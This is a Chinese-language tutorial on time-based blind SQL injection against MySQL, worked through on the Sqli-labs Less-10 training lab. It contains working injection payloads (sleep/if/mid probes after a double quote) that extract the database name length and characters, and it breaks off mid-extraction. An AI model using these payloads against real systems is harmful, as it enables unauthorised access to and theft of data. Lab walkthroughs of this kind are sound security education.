SQL Injection | SQL 注入 —

SQL Injection | SQL 注入 —— 时间盲注

关注这个漏洞的其他相关笔记：SQL 注入漏洞 - 学习手册-CSDN博客

0x01：时间盲注 —— 理论篇

时间盲注（Time-Based Blind SQL Injection）是一种常见的 SQL 注入技术，适用于那些页面不会返回错误信息，只会回显一种界面的情况。

时间盲注的攻击原理：攻击者通过向 SQL 查询中注入特定的延时函数，使数据库的查询时间变长，从而根据页面响应时间的差异来推断攻击的结果是否成功。

0x0101：MySQL 时间盲注 — 相关函数

下面介绍一些对 MySQL 数据库进行时间盲注时的相关函数及其使用示例：

函数名	函数解析	用法示例
`sleep()`	使当前会话（或连接）暂停指定的秒数	`select sleep(3);`
`benchmark()`	对一个表达式重复执行指定次数的计算	`select benchmark(10000, Now());`
`if(条件, 结果1, 结果2)`	条件正确，返回结果 1；否则，返回结果2	`select if(1=2, 3, 4);`
`mid(string,start_pos,count)`	从 start_pos 开始，截取 string 的 count 位字符。	`select mid('12',1,1);`
`substr(string,start_pos,count)`	从 start_pos 开始，截取 string 的 count 位字符。	`select substr('12',2,1);`
`left(string,count)`	从左侧截取 string 的前 count 位字符。	`select left('123',2);`
`length()`	返回字符串的长度	`select length('ni');`
`ord()`	获取字符对应的 ASCII 码值	`select ord('A');`
`ascii()`	获取字符对应的 ASCII 码值。	`select ascii('A');`

0x02：时间盲注 —— 实战篇

本节重点在于熟悉时间盲注的注入流程，以及注入原理。练习靶场为 Sqli-labs Less-10 GET - Blind - Time based - Double Quotes，靶场的配套资源如下（附安装教程）：

实验工具准备

PHP 运行环境：phpstudy_x64_8.1.1.3.zip（PHP 7.X + Apache + MySQL）

SQLI LABS 靶场：sqli-labs-php7.zip（安装教程：SQLI LABS 靶场安装）

0x0201：第一阶段 — 判断注入点

进入靶场，靶场提示 Please input the ID as parameter with numeric value 要我们输入一个数字型的 ID 作为参数进行查询，那我们就按它的意思传入 id 看看网页返回的结果：

如上，靶场返回了一段字符 You are in。似乎它是认可我们的操作了，但我们并没有从中获取什么有用的信息。

接下来，笔者又尝试给它传递了一个异常的值（字符串类型）：

如上，靶场依旧返回了 You are in。我们明明传递的是不符合要求的值，结果它还是返回正常的结果，这个本身就有问题。

为了摸清楚靶场的底线，笔者这里又进行了一系列的测试：

 测试 Payload 1: ?id=1        结果: You are in测试 Payload 2: ?id=3-2      结果: You are in测试 Payload 3: ?id=1 a      结果: You are in测试 Payload 4: ?id=1a'      结果: You are in测试 Payload 5: ?id=1a"      结果: You are in测试 Payload 6: ?id=b'")(    结果: You are in

可以看到，这关就像是一个无底洞，你给它啥它都会回应你 You are in，你根本摸不透它。

此时，我们需要转变一下测试思路：You are in 是不是就是它的一个障眼法呢，其实它已经背着我们偷偷执行了 SQL 语句，但是由于一直都返回同样的结果，导致我们无法发现呢。

面对上面这种情况，我们就可以采用时间盲注的手段，来看看它有没有偷偷背着我们干坏事了：

知识拓展：如何查看浏览器响应包加载速度

打开浏览器，鼠标右击页面并选择 ”检查“，打开 ”开发者工具“：

定位到 “网络（NetWork）” 菜单，并刷新当前页面，即可看到网页响应包的加载速度：

 测试 Payload 1: ?id=1 and sleep(5) --+    结果: 24 ms 响应，失败测试 Payload 2: ?id=1' and sleep(5) --+   结果: 9 ms 响应，失败测试 Payload 3: ?id=1" and sleep(5) --+   结果: 5.02 s 响应，成功

从上面的回显可以看出，它果然背着我们偷偷的执行了 SQL 语句，不过小动作还是被聪明的我们发现啦。

通过上面测试的 Payload，我们已经可以确定了，目标的 GET 型请求参数 id 处存在 SQL 注入漏洞，且注入模板如下：

 注入模板: ?id=1" and sleep(if(攻击语句,5,0)) --+"推测目标后端模板: select * from users where id="1" and sleep(if(攻击语句,5,0)) --+""笔者备注: if(攻击语句,5,0) 这么写的原因是，如果攻击成功则页面延时 5 秒返回，否则无延时返回（你失败的推测肯定比你正确的多，这么写可以加快点速度）。

0x0202：第二阶段 — 时间盲注漏洞利用

本节中，我们主要介绍如何通过时间盲注，来获取目标数据库内的真实信息，这里需要用到一些数据库的相关函数，不了解的可以去文章开头的函数表格中查询用法。

1. 猜测数据库名长度

要获取数据库的真实信息，我们就需要摸清当前数据库的结构。比如有哪些数据库，每个数据库下有哪些表，每张表中有哪些字段。

盲注中的服务器当然不会直接回显，所以我们就需要自己构造 SQL 语句去猜啦。首先猜测数据库名称的长度（知道长度后才好猜解每一位的内容）：

 -- 猜测数据库名称长度为 1，若返回为 True，则证明猜测正确攻击 Payload 01: ?id=1" and sleep(if(length(database())=1,5,0)) --+"推测目标后端执行的语句: select * from users where id="1" and sleep(if(length(database())=1,5,0)) --+""攻击结果: 9 ms 响应，失败-- 猜测数据库名称长度为 2，若返回为 True，则证明猜测正确攻击 Payload 02: ?id=1" and sleep(if(length(database())=2,5,0)) --+"推测目标后端执行的语句: select * from users where id="1" and sleep(if(length(database())=2,5,0)) --+""攻击结果: 10 ms 响应，失败...-- 猜测数据库名称长度为 8，若返回为 True，则证明猜测正确攻击 Payload 08: ?id=1" and sleep(if(length(database())=8,5,0)) --+"推测目标后端执行的语句: select * from users where id="1" and sleep(if(length(database())=8,5,0)) --+""攻击结果: 5.01 s 响应，成功

如上，我们成功通过时间盲注（响应包延时）判断出了，目标当前使用的数据库的名称长度为 8。

2. 猜解数据库名称

知道了目标当前使用的数据库的名称的长度后，我们就可以一个字符一个字符的进行猜解了，Payload 如下：

 -- 猜测数据库的第一个字符为 'a'，若返回为 True，则证明猜测正确攻击 Payload 01: ?id=1" and sleep(if(mid(database(),1,1)='a',5,0)) --+"推测目标后端执行的语句: select * from users where id="1" and sleep(if(mid(database(),1,1)='a',5,0)) --+""攻击结果: 11 ms 响应，失败-- 猜测数据库的第一个字符为 'b'，若返回为 True，则证明猜测正确攻击 Payload 02: ?id=1" and sleep(if(mid(database(),1,1)='b',5,0)) --+"推测目标后端执行的语句: select * from users where id="1" and sleep(if(mid(database(),1,1)='b',5,0)) --+""攻击结果: 7 ms 响应，失败...-- 猜测数据库的第一个字符为 's'，若返回为 True，则证明猜测正确攻击 Payload 18: ?id=1" and sleep(if(mid(database(),1,1)='s',5,0)) --+"推测目标后端执行的语句: select * from users where id="1" and sleep(if(mid(database(),1,1)='s',5,0)) --+""攻击结果: 5.02 s 响应，成功...